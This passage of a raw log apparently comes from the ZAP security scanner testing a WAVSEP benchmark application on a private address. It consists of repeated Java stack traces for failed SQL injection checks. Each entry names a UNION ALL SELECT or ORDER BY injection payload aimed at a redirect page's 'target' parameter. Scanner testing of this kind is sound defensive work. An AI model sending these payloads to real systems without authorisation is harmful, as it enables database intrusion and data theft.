org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679777 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679778 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679779 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679780 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679781 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679781 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679782 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 5951#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 5951# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679783 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679784 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679785 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679785 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679786 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679787 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 